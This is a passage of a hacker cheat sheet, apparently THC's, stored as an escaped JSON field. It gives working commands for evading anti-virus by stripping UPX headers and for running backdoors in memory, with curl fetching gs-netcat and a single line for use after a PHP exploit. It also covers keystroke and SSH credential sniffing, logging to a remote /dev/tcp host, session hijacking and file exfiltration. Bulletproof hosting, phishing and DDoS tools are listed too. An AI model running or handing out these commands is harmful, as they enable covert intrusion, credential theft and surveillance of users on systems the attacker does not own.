-o \"${BIN}\"\n```\n\nCleanse the [UPX header](https://github.com/upx/upx/blob/devel/src/stub/src/include/header.S) and 2nd ELF header to fool the Anit-Virus:\n```shell\nperl -i -0777 -pe 's/^(.{64})(.{0,256})UPX!.{4}/$1$2\\0\\0\\0\\0\\0\\0\\0\\0/s' \"${BIN}\"\nperl -i -0777 -pe 's/^(.{64})(.{0,256})\\x7fELF/$1$2\\0\\0\\0\\0/s' \"${BIN}\"\n```\n\nOptionally cleanse signatures and traces of UPX:\n```shell\ncat \"${BIN}\" \\\n| perl -e 'local($/);$_=\u003c\u003e;s/(.*)(\\$Info:[^\\0]*)(.*)/print \"$1\";print \"\\0\"x length($2); print \"$3\"/es;' \\\n| perl -e 'local($/);$_=\u003c\u003e;s/(.*)(\\$Id:[^\\0]*)(.*)/print \"$1\";print \"\\0\"x length($2); print \"$3\"/es;' \\\n| perl -e 'local($/);$_=\u003c\u003e;s/(.*)(PROT_EXEC\\|PROT_WRI[^\\0]*)(.*)/print \"$1\";print \"\\0\"x length($2); print \"$3\"/es;' \u003e\"${BIN}.tmpupx\"\ncat \"${BIN}.tmpupx\" \u003e\"${BIN}\"\nrm -f \"${BIN}.tmpupx\"\nperl -i -0777 -pe 's/UPX!/\\0\\0\\0\\0/sg' \"${BIN}\"\n```\n\nVerify that binary can not be unpacked:\n```shell\nupx -d \"${BIN}\" # Should fail with 'not packed by UPX'\n```\n\nOptionally encrypt it with [Ezuri](https://github.com/guitmz/ezuri) thereafter.\n\n\u003ca id=\"memexec\"\u003e\u003c/a\u003e\n**8.viii. Deploying a backdoor without touching the file-system**\n\nHow to start a backdoor without writing to the file-system or when all writeable locations are mounted with the evil `noexec`-flag.\n\nA Perl one-liner to load a binary into memory and execute it (without touching any disk or /dev/shm or /tmp).\n```sh\nmemexec() {\n local stropen strread\n local strargv0='\"foo\", '\n [ -t 0 ] \u0026\u0026 {\n stropen=\"open(\\$i, '\u003c', '$1') or die 'open: \\$!';\"\n strread='$i'\n unset strargv0\n }\n # Check Syscall-NR: perl -e 'require \"sys/syscall.ph\"; printf \u0026SYS_memfd_create;'\n perl -e '$f=syscall(319, $n=\"\", 1);\nif(-1==$f){ $f=syscall(279, $n=\"\", 1); if(-1==$f){ die \"memfd_create: $!\";}}\n'\"${stropen}\"'\nopen($o, \"\u003e\u0026=\".$f) or die \"open: $!\";\nwhile(\u003c'\"${strread:-STDIN}\"'\u003e){print $o $_;}\nexec {\"/proc/$$/fd/$f\"} '\"${strargv0}\"'@ARGV or die \"exec: $!\";' -- \"$@\"\n}\n# Example usage:\n# memexec /usr/bin/id -u\n# cat /usr/bin/id | memexec -u\n# curl -SsfL https://thc.org/my-backdoor-binary | memexec\n```\n\nThe shortest possible variant is (example):\n```shell\nmemexec(){ perl '-efor(319,279){($f=syscall$_,$\",1)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV' -- \"$@\";}\n# Example: cat /usr/bin/id | memexec -u\n```\n(Thank you [tmp.Out](https://tmpout.sh/) for some educated discussions and [previous work](https://captain-woof.medium.com/how-to-execute-an-elf-in-memory-living-off-the-land-c7e67dbc3100) by others)\n\nDeploy gsocket without writing to the filesystem (example):\n```sh\nGS_ARGS=\"-ilqD -s SecretChangeMe31337\" memexec \u003c(curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m))\n```\n\nThe backdoor can also be piped via SSH directly into the remote's memory, and executed:\n```sh\nMX='-efor(319,279){($f=syscall$_,$\",1)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV'\ncurl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | ssh root@foobar \"exec perl '$MX' -- -ilqD -s SecretChangeMe31337\"\n```\n\nIf you have a single-shot at remote executing a command (like via a PHP exploit) then this is your line:\n```sh\ncurl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)|perl '-efor(319,279){($f=syscall$_,$\",1)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}X,@ARGV' -- -ilqD -s SecretChangeMe31337\n```\n\n---\n\u003ca id=\"crypto\"\u003e\u003c/a\u003e\n## 9. Crypto\n\u003ca id=\"gen-password\"\u003e\u003c/a\u003e\n**9.i. Generate quick random Password**\n\nGood for quick passwords without human element.\n\n```sh\nopenssl rand -base64 24\n```\n\nIf `openssl` is not available then we can also use `head` to read from `/dev/urandom`.\n\n```sh\nhead -c 32 \u003c /dev/urandom | xxd -p -c 32\n```\n\nor make it alpha-numeric\n\n```sh\nhead -c 32 \u003c /dev/urandom | base64 | tr -dc '[:alnum:]' | head -c 16\n```\n\n\u003ca id=\"crypto-filesystem\"\u003e\u003c/a\u003e\n**9.ii.a. Linux transportable encrypted filesystems - cryptsetup**\n\nCreate a 256MB large encrypted file system. You will be prompted for a password.\n\n```sh\ndd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock\ncryptsetup luksFormat /tmp/crypted\ncryptsetup open /tmp/crypted sec\nmkfs -t ext3 /dev/mapper/sec\n```\n\nMount:\n\n```sh\ncryptsetup open /tmp/crypted sec\nmount -o nofail,noatime /dev/mapper/sec /mnt/sec\n```\n\nStore data in `/mnt/crypted`, then unmount:\n\n```sh\numount /mnt/sec\ncryptsetup close sec \n```\n\u003ca id=\"encfs\"\u003e\u003c/a\u003e\n**9.ii.b. Linux transportable encrypted filesystems - EncFS**\n\nCreate ```.sec``` and store the encrypted data in ```.raw```:\n```sh\nmkdir .raw .sec\nencfs --standard \"${PWD}/.raw\" \"${PWD}/.sec\"\n```\n\nunmount:\n```sh\nfusermount -u .sec\n```\n\n\u003ca id=\"encrypting-file\"\u003e\u003c/a\u003e\n**9.iii Encrypting a file**\n\nEncrypt your 0-Days and log files before transferring them - please. (and pick your own password):\n\n```sh\n# Encrypt\nopenssl enc -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I \u003cinput.txt \u003einput.txt.enc\n```\n\n```sh\n# Decrypt\nopenssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I \u003cinput.txt.enc \u003einput.txt\n```\n\n---\n\u003ca id=\"sniffing\"\u003e\u003c/a\u003e\n## 10. Session sniffing and hijaking\n\u003ca id=\"session-sniffing\"\u003e\u003c/a\u003e\n**10.i Sniff a user's SHELL session**\n\nA 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user. \n\nDeploy: Cut \u0026 paste the following onto the target and follow the instructions:\n```sh\ncommand -v bash \u003e/dev/null || { echo \"Not found: /bin/bash\"; false; } \\\n\u0026\u0026 { mkdir -p ~/.config/.pty 2\u003e/dev/null; :; } \\\n\u0026\u0026 curl -o ~/.config/.pty/pty -fsSL \"https://bin.pkgforge.dev/$(uname -m)/Baseutils/util-linux/script\" \\\n\u0026\u0026 curl -o ~/.config/.pty/ini -fsSL \"https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)\" \\\n\u0026\u0026 chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \\\n\u0026\u0026 echo -e '----------\\n\\e[0;32mSUCCESS\\e[0m. Add the following line to \\e[0;36m~/.bashrc\\e[0m:\\e[0;35m' \\\n\u0026\u0026 echo -e '[ -z \"$LC_PTY\" ] \u0026\u0026 [ -t 0 ] \u0026\u0026 [[ \"$HISTFILE\" != *null* ]] \u0026\u0026 { ~/.config/.pty/ini -h \u0026\u0026 ~/.config/.pty/pty -V; } \u0026\u003e/dev/null \u0026\u0026 LC_PTY=1 exec ~/.config/.pty/ini -a \"sshd: pts/0\" ~/.config/.pty/pty -fqaec \"exec ${BASH_EXECUTION_STRING:--a -bash '\"$(command -v bash)\"'}\" -I ~/.config/.pty/.@pty-unix.$$\\e[0m'\n```\n\n- Combined with zapper to hide command options from the process list.\n- Requires `/usr/bin/script` from util-linux \u003e= 2.37 (-I flag). We pull the static bin from [pkgforge](https://bin.pkgforge.dev). \n- Consider using /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.\n- Log in with `ssh -o \"SetEnv LC_PTY=1\"` to disable logging.\n\n\u003ca id=\"dtrace\"\u003e\u003c/a\u003e\n**10.ii Sniff all SHELL sessions with dtrace - FreeBSD**\n\nEspecially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes.\n\nCopy this \"D Script\" to the target system to a file named `d`:\n```c\n#pragma D option quiet\ninline string NAME = \"sshd\";\nsyscall::write:entry\n/(arg0 \u003e= 5) \u0026\u0026 (arg2 \u003c= 16) \u0026\u0026 (execname == NAME)/\n{ printf(\"%d: %s\\n\", pid, stringof(copyin(arg1, arg2))); }\n```\n\nStart a dtrace and log to /tmp/.log:\n```sh\n### Start kernel probe as background process.\n(dtrace -sd \u003e/tmp/.log \u0026)\n```\n\n\u003ca id=\"bpf\"\u003e\u003c/a\u003e\n**10.iii Sniff all SHELL sessions with eBPF - Linux**\n\neBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better \"dtrace\" but for Linux. \n\n```sh\ncurl -o bpftrace -fsSL https://github.com/iovisor/bpftrace/releases/latest/download/bpftrace\nchmod 755 bpftrace\ncurl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/ptysnoop.bt\n./bpftrace -Bnone ptysnoop.bt\n```\nCheck out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://github.com/hackerschoice/bpfhacks).\n\n\u003ca id=\"ssh-sniffing-strace\"\u003e\u003c/a\u003e\n**10.iv Sniff a user's SSH, bash or SSHD session with strace**\n```sh\ntit() {\n\tstrace -e trace=\"${1:?}\" -p \"${2:?}\" 2\u003e\u00261 | gawk 'BEGIN{ORS=\"\"}/\\.\\.\\./ { next }; {$0 = substr($0, index($0, \"\\\"\")+1); sub(/\"[^\"]*$/, \"\", $0); gsub(/(\\\\33){1,}\\[[0-9;]*[^0-9;]?||\\\\33O[ABCDR]?/, \"\"); if ($0==\"\\\\r\"){print \"\\n\"}else{print $0; fflush()}}'\n\t# strace -e trace=\"${1:?}\" -p \"${2:?}\" 2\u003e\u00261 | stdbuf -oL grep -vF ... | awk 'BEGIN{FS=\"\\\"\";}{if ($2==\"\\\\r\"){print \"\"}else{printf $2}}'\n}\n# tit read $(pidof -s ssh)\n# tit read $(pidof -s bash)\n# tit write $(pgrep -f 'sshd.*pts' | head -n1)\n```\nIt is also possible to sniff the SSHD process (captures also sudo passwords etc). Note that we trace the `write()` call instead (because sshd 'writes' data to the bash):\n```sh\n# Find the sshd PID that spawned the bash:\nps -eF | grep -E '(^UID|sshd.*pts)' | grep -v ' grep'\n...\nUID PID PPID C SZ RSS PSR STIME TTY TIME CMD\nparalle+ 7770 7764 0 5088 6780 1 Aug28 ? 00:00:05 sshd: parallels@pts/0\nparalle+ 9056 9050 0 5088 6652 1 Aug28 ? 00:00:00 sshd: parallels@pts/1\nparalle+ 11938 11932 0 5074 6772 1 10:59 ? 00:00:00 sshd: parallels@pts/3\n...\n```\n\nSniff 7770 (example):\n```shell\ntit write 7770\n```\n\n\u003ca id=\"ssh-sniffing-wrapper\"\u003e\u003c/a\u003e\n**10.v. Sniff a user's outgoing SSH session with a wrapper script**\n\nEven dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions)\n\nCreate a wrapper script called 'ssh' that executes strace + ssh to log the session:\n\u003cdetails\u003e\n \u003csummary\u003eShow wrapper script - CLICK HERE\u003c/summary\u003e\n\n```sh\n# Cut \u0026 Paste the following into a bash shell:\n# Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh:\necho 'PATH=~/.local/bin:$PATH #0xFD0E' \u003e\u003e~/.profile\n\n# Create a log directory and our own ssh binary\nmkdir -p ~/.local/bin ~/.local/logs\n\ncat \u003c\u003c__EOF__ \u003e~/.local/bin/ssh\n#! /bin/bash\nstrace -e trace=read -I 1 -o '! ~/.local/bin/ssh-log \\$\\$' /usr/bin/ssh \\$@\n__EOF__\n\ncat \u003c\u003c__EOF__ \u003e~/.local/bin/ssh-log\n#! /bin/bash\ngrep -F 'read(4' | cut -f2 -d\\\\\" | while read -r x; do\n [[ \\${#x} -gt 5 ]] \u0026\u0026 continue \n [[ \\${x} == +(\\\\\\\\n|\\\\\\\\r) ]] \u0026\u0026 { echo \"\"; continue; }\n echo -n \"\\${x}\"\ndone \u003e\\$HOME/.local/logs/ssh-log-\"\\${1}\"-\\`date +%s\\`.txt\n__EOF__\n\nchmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log\n. ~/.profile\n\necho -e \"\\033[1;32m***SUCCESS***.\nLogfiles stored in ~/.local/.logs/.\nTo uninstall cut \u0026 paste this\\033[0m:\\033[1;36m\n grep -v 0xFD0E ~/.profile \u003e~/.profile-new \u0026\u0026 mv ~/.profile-new ~/.profile\n rm -rf ~/.local/bin/ssh ~/.local/bin/ssh-log ~/.local/logs/ssh-log*.txt\n rmdir ~/.local/bin ~/.local/logs ~/.local \u0026\u003e/dev/null \\033[0m\"\n```\n(thanks to Gerald for testing this)\n\u003c/details\u003e\n\nThe SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH.\n\n\u003ca id=\"ssh-sniffing-sshit\"\u003e\u003c/a\u003e\n**10.vi Sniff a user's outgoing SSH session using SSH-IT**\n\nThe easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/).\n\n```sh\nbash -c \"$(curl -fsSL https://thc.org/ssh-it/x)\"\n```\n\n\u003ca id=\"hijack\"\u003e\u003c/a\u003e\n**10.vii Hijack / Take-over a running SSH session** \n\nUse [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session:\n```sh\nps ax -o pid,ppid,cmd | grep 'ssh '\n./reptyr -T \u003cSSH PID\u003e\n### or: ./reptyr -T $(pidof -s ssh)\n### Must use '-T' or otherwise the original user will see that his SSH process gets suspended.\n```\n\n---\n\u003ca id=\"vpn-shell\"\u003e\u003c/a\u003e\n## 11. VPN \u0026 Shells\n\u003ca id=\"shell\"\u003e\u003c/a\u003e\n**11.i. Disposable Root Servers**\n\n```console\n$ ssh root@segfault.net # Use password 'segfault'\n```\n\nhttps://thc.org/segfault\n\n\u003ca id=\"vpn\"\u003e\u003c/a\u003e\n**11.ii. VPN/VPS/Proxies**\n\nTrusted VPN Providers\n1. https://www.mullvad.net\n1. https://www.cryptostorm.is\n2. https://ivpn.net\n1. https://proton.me - Offers FREE VPN\n1. https://vpn.fail - Run by volunteers\n\nVirtual Private Servers. Please check [offshore.cat](https://offshore.cat/).\n1. https://www.hetzner.com - Cheap\n2. https://hivecloud.pw - No KYC. Bullet Proof. Accepts Crypto.\n1. https://dmzhost.co - Ignore most abuse requests\n2. https://alexhost.com - No KYC. Bullet Proof. DMCA free zone\n3. https://basehost.eu - Ignores court orders\n4. https://buyvm.net - Warez best friend\n5. https://serverius.net - Used by gangsters\n6. https://1984.hosting - Privacy\n7. https://bithost.io - Reseller for DigitalOcean, Linode, Hetzner and Vultr (accepts Crypto)\n8. https://www.privatelayer.com - Swiss based.\n\nSee [other KYC Free Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/))\n\nProxies (we dont use any of those)\n1. [V2Ray Proxies](https://github.com/mahdibland/V2RayAggregator)\n2. [Hola Proxies](https://github.com/snawoot/hola-proxy)\n3. [Zaeem's Free Proxy List](https://github.com/Zaeem20/FREE_PROXIES_LIST)\n4. [Proxy Broker 2](https://github.com/bluet/proxybroker2)\n5. [proxyscrape.com](https://api.proxyscrape.com/v2/?request=displayproxies\u0026protocol=all\u0026timeout=750\u0026country=all)\n6. [my-proxy.com](https://www.my-proxy.com)\n7. [getfreeproxylists.blogspot.com](https://getfreeproxylists.blogspot.com/)\n8. [proxypedia.org](https://proxypedia.org/)\n9. [socks-proxy.net](https://socks-proxy.net/)\n10. [Segfault](https://www.thc.org/segfault): `curl -x socks5h://$(PROXY) ipinfo.io` - selects a random proxy for every request\n\nMany other services (for free) \n1. https://free-for.dev/\n\n---\n\u003ca id=\"osint\"\u003e\u003c/a\u003e\n## 12. Intelligence Gathering\n\nReverse DNS from multiple public databases:\n```sh\nrdns () {\n curl -fsSL \"https://ip.thc.org/api/v1/download?ip_address=${1:?}\u0026limit=10\u0026apex_domain=${2}\" | column -t -s,\n}\n# rdns \u003cIP\u003e\n```\n\nFind sub domains from TLS Database:\n```sh\ncrt() {\n [ $# -ne 1 ] \u0026\u0026 { echo \u003e\u00262 \"crt \u003cdomain-name\u003e\"; return 255; }\n curl -fsSL \"https://crt.sh/?q=${1:?}\u0026output=json\" --compressed | jq -r '.[].common_name,.[].name_value' | anew | sed 's/^\\*\\.//g' | tr '[:upper:]' '[:lower:]'\n}\n# crt \u003cdomain\u003e\n```\n\n| OSINT Hacker Tools ||\n| --- | --- |\n| https://api.c99.nl | Free: [Subdomain Finder](https://subdomainfinder.c99.nl), PAID: Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. | \n| https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search, and more |\n| https://cli.fyi | Free. curl/json interface to many services. Try `curl cli.fyi/me` or `curl cli.fyi/thc.org`. |\n| https://check-your-website.server-daten.de | Free. TLS/DNS/Security check a domain. |\n| https://ipsniper.info/api.html | rDNS/fDNS and other IP information tools |\n| https://ip.thc.org | fDNS/rDNS lookup: `curl -fL ip.thc.org/140.82.121.3` |\n| https://hackertarget.com/ip-tools/ | Free OSINT Service (Reverse IP, MTR, port scan, CMS scans, Vulnerability Scans, API support) |\n| https://account.shodan.io/billing/tour | Open Port DB \u0026 DNS Lookup from around the world |\n| https://dnsdumpster.com/ | Domain Recon Tool |\n| https://crt.sh/ | TLS Certificate Search |\n| https://archive.org/web/ | Historical view of websites |\n| https://www.farsightsecurity.com/solutions/dnsdb/ | DNS search (not free) |\n| https://wigle.net/ | Wireless Network Mapper |\n| https://radiocells.org/ | Cell Tower Information |\n| https://www.shodan.io/ | Search Engine to find devices \u0026 Banners (not free) |\n| https://spur.us/context/me | IP rating `https://spur.us/context/\u003cIP\u003e` |\n| http://drs.whoisxmlapi.com | Reverse Whois Lookup (not free) |\n| https://www.abuseipdb.com | IP abuse rating |\n\n| OSINT for Detectives ||\n| --- | --- |\n| https://start.me/p/rx6Qj8/nixintel-s-osint-resource-list | Nixintel's OSINT Resource List |\n| https://github.com/jivoi/awesome-osint | Awesome OSINT list |\n| https://cipher387.github.io/osint_stuff_tool_collection/ | OSINT tools collection |\n| https://osintframework.com/ | Many OSINT tools |\n\n| OSINT Databases ||\n| --- | --- |\n| https://data.ddosecrets.com/ | Database Dumps\n\n---\n\u003ca id=\"misc\"\u003e\u003c/a\u003e\n## 13. Miscellaneous\n\u003ca id=\"tools\"\u003e\u003c/a\u003e\n**13.i. Tools of the trade**\n\nComms\n1. [CryptoStorm Email](https://www.cs.email/) - Disposable emails (send \u0026 receive). (List of [Disposable-email-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-email-services])).\n1. [Temp-Mail](https://temp-mail.org/en/) - Disposable email service with great Web GUI. Receive only.\n2. [tuta.io](https://tuta.io) or [ProtonMail](https://pm.me)/[.onion](https://protonmailrmez3lotccipshtkleegetolb73fuirgj7r4o4vfu7ozyd.onion/) - Free \u0026 Private email\n1. [Quackr.Io](https://quackr.io/) - Disposable SMS/text messages (List of [Disposable-SMS-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-SMS-services)).\n1. [SMS-Man](https://sms-man.com) - Anonymous SMS/text that work with Signal, WA, and manh others \n1. [Crypton](https://crypton.sh/) - Rent a private SIM/SMS with crypto ([.onion](http://cryptonx6nsmspsnpicuihgmbbz3qvro4na35od3eht4vojdo7glm6yd.onion/))\n2. [List of \"No KYC\" Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/))\n\nOpSec\n1. [OpSec for Rebellions](https://medium.com/@hackerschoice/it-security-and-privacy-for-the-rebellions-of-the-world-db4023cadcca) - Start Here. The simplest 3 steps.\n1. [RiseUp](https://riseup.net/) - Mail, VPN and Tips for (online) rebellions.\n2. [CryptoPad](https://cryptpad.fr)/[DisRoot](https://disroot.org/eng) - IT infra to stage a rebellion.\n1. [Neko](https://github.com/m1k1o/neko) - Launch Firefox in Docker and access via 127.0.0.1:8080 (WebRTC)\n2. [x11Docker](https://github.com/mviereck/x11docker) - Isolate any X11 app in a container (Linux \u0026 Windows only). ([Article](https://techviewleo.com/run-gui-applications-in-docker-using-x11docker/?expand_article=1))\n3. [DangerZone](https://github.com/freedomofpress/dangerzone) - Make PDFs safe before opening them.\n4. [ExifTool](https://exiftool.org/) - Remove meta data from files (`exiftool -all= example.pdf example1.jpg ...`)\n5. [EFF](https://www.eff.org/) - Clever advise for freedom figthers.\n\nExploits\n1. [ttyinject](https://github.com/hackerschoice/ttyinject) and [ptyspy](#10-session-sniffing-and-hijaking) for LPE.\n1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score \u0026 PoC search (by xaitax)\n1. [Traitor](https://github.com/liamg/traitor) - Tries various exploits/vulnerabilities to gain root (LPE)\n1. [PacketStorm](https://packetstormsecurity.com) - Our favorite site ever since we shared a Pizza with fringe[at]dtmf.org in NYC in 2000\n1. [ExploitDB](https://www.exploit-db.com) - Also includes metasploit db and google hacking db\n1. [Shodan/Exploits](https://exploits.shodan.io/welcome) - Similar to exploit-db\n\nSystem Information Gathering\n1. `curl -fsSL https://thc.org/ws | bash` - Show all domains hosted on a server + system-information\n1. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - Quick system information for hackers.\n1. https://github.com/zMarch/Orc - Post-exploit tool to find local RCE (type `getexploit` after install)\n1. https://github.com/The-Z-Labs/linux-exploit-suggester - Suggest exploits based on versions on target system \n1. https://github.com/efchatz/pandora - Windows: dump password from various password managers\n\nBackdoors\n1. https://www.gsocket.io/deploy - The world's smallest backdoor\n1. https://github.com/m0nad/Diamorphine - Linux Kernel Module for hiding processes and files\n1. https://www.kali.org/tools/weevely - PHP backdoor\n\nNetwork Scanners\n1. https://github.com/robertdavidgraham/masscan - Scan the entire Internet\n1. https://github.com/ptrrkssn/pnscan - Fast network scanner\n1. https://zmap.io/ - ZMap \u0026 ZGrab\n\nVulnerability Scanners (be aware: these all yield 99% non-exploitable false positives. They all suck.)\n1. [Raccoon](https://github.com/evyatarmeged/Raccoon) - Reconnaissance and Information Gathering\n1. [Osmedeus](https://github.com/j3ssie/osmedeus) - Vulnerability and Information gathering\n1. [FullHunt](https://github.com/fullhunt/) - log4j and spring4shell scanner \n\nDDoS\n1. [DeepNet](https://github.com/the-deepnet/ddos) - we despise DDoS but if we had to then this would be our choice.\n\nStatic Binaries / pre-compiled Tools\n1. https://bin.pkgforge.dev https://pkgs.pkgforge.dev ([github](https://github.com/pkgforge/soarpkgs), [Soar Project](https://github.com/pkgforge/soar))\n1. https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64\n2. https://lolbas-project.github.io/ (Windows)\n1. https://iq.thc.org/cross-compiling-exploits\n\nPhishing\n1. https://github.com/htr-tech/zphisher - We don't hack like this but this is what we would use.\n2. https://da.gd/ - Tinier TinyUrl and allows https://www.google.com-fish-fish@da.gd/blah\n\nTools\n1. https://github.com/guitmz/ezuri - Obfuscate Linux binaries\n1. https://tmate.io/ - Share a screen with others\n\nCallback / Canary / Command \u0026 Control\n1. https://app.interactsh.com\n1. https://api.telegram.org\n1. https://webhook.site\n\nTunneling\n1. [Gost](https://github.com/ginuerzh/gost/blob/master/README_en.md)\n1. [WireTap](https://github.com/sandialabs/wiretap) or [Segfault's WireGuard](https://www.thc.org/segfault/wireguard/).\n1. [ngrok](https://ngrok.com/download), [cloudflared](https://developers.cloudflare.com/cloudflare-one/connections/connect-apps) or [pagekite](https://pagekite.net/) to make a server behind NAT accessible from the public Internet.\n\nExfil\u003ca id=\"cloudexfil\"\u003e\u003c/a\u003e\n1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l` / `blitz foo.txt`\n2. [RedDrop](https://github.com/cyberbutler/RedDrop) - run your own Exfil Server\n1. [Mega](https://mega.io/cmd)\n2. [oshiAt](https://oshi.at/) - also on TOR. `curl -T foo.txt https://oshi.at`\n3. [0x0.at](https://0x0.st) - `curl -F'file=@foo.txt' https://0x0.st/`\n5. [Transfer.sh](https://transfer.sh/) - `curl -T foo.txt https://transfer.sh`\n6. [LitterBox](https://litterbox.catbox.moe/tools.php) - `curl -F reqtype=fileupload -F time=72h -F 'fileToUpload=@foo.txt' https://litterbox.catbox.moe/resources/internals/api.php` \n7. [Croc](https://github.com/schollz/croc) - `croc send foo.txt / croc anit-price-example`\n8. [MagicWormhole](https://pypi.org/project/magic-wormhole/)\n\nPublishing\u003ca id=\"pub\"\u003e\u003c/a\u003e\n1. [free BT/DC/eD2k seedbox](https://valdikss.org.ru/schare/)\n1. Or use /onion on [segfault.net](https://www.thc.org/segfault) or plain old https with ngrok.\n1. [DuckDNS](https://www.duckdns.org/) - Free Domain Names\n1. [AnonDNS](https://anondns.net/) - Free Domain Name (anonymous)\n1. [afraid.org](https://www.afraid.org) - Free Dynamic DNS for your domain\n2. [hostwinds](https://hostwinds.com) - Pay with crypto\n3. [unstoppable domains](https://unstoppabledomains.com) - Pay with crypto\n1. [he.net](https://dns.he.net/) - Free Nameserver service\n1. [0bin](https://0bin.net/) / [paste.ec](https://paste.ec) - Encrypted PasteBin\n1. [pad.riseup.net](https://pad.riseup.net) - Create documents and share them securely\n\nForums and Conferences\n1. [AlligatorCon](https://www.alligatorcon.eu/) - the original\n1. [0x41con](https://0x41con.org/)\n1. [TumpiCon](https://tumpicon.org/)\n1. [0x00sec](https://0x00sec.org/)\n\nTelegram Channels\u003ca id=\"channels\"\u003e\u003c/a\u003e\n1. [The Hacker's Choice](https://t.me/thcorg)\n1. [The Hacker News](https://t.me/thehackernews)\n1. [CyberSecurity Technologies](https://t.me/CyberSecurityTechnologies)\n1. [Offensive Twitter](https://t.me/OffensiveTwitter)\n1. [Pwn3rzs](https://t.me/Pwn3rzs)\n1. [VX-Underground](https://t.me/vxunderground)\n1. [Android Security / Malware](https://t.me/androidMalware)\n1. [OSINT CyberDetective](https://t.me/cybdetective)\n1. [BookZillaaa](https://t.me/bookzillaaa)\n\nMindmaps \u0026 Knowledge\n1. [Compass Sec Cheat Sheets](https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet)\n2. [Network Pentesting](https://github.com/wearecaster/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.png)\n1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg)\n\n\u003ca id=\"cool-linux-commands\"\u003e\u003c/a\u003e\n**13.ii. Cool Linux commands**\n\n1. https://jvns.ca/blog/2022/04/12/a-list-of-new-ish--command-line-tools/\n1. https://github.com/ibraheemdev/modern-unix\n\n\u003ca id=\"tmux\"\u003e\u003c/a\u003e\n**13.iii. Tmux Cheat Sheet**\n\n\n| | Tmux Cheat Sheet |\n| --- | --- |\n| Max Buffer | `Ctrl-b` + `:` + `set-option -g history-limit 65535` |\n| SaveScrollback | `Ctrl-b` + `:` + `capture-pane -S -` followed by `Ctrl-b` + `:` + `save-buffer filename.txt`. |\n| SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. |\n| Clear | `tmux send-keys -R C-l \\; clear-history -t6.0` to clear screen and delete scrollback history. |\n| Logging | `Ctrl-b` + `:` + `bind-key P pipe-pane -o \"exec cat \u003e\u003e$HOME/'tmux-#W-#S.log'\" \\; display-message 'Toggling ~/tmux-#W-#","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet/lists"}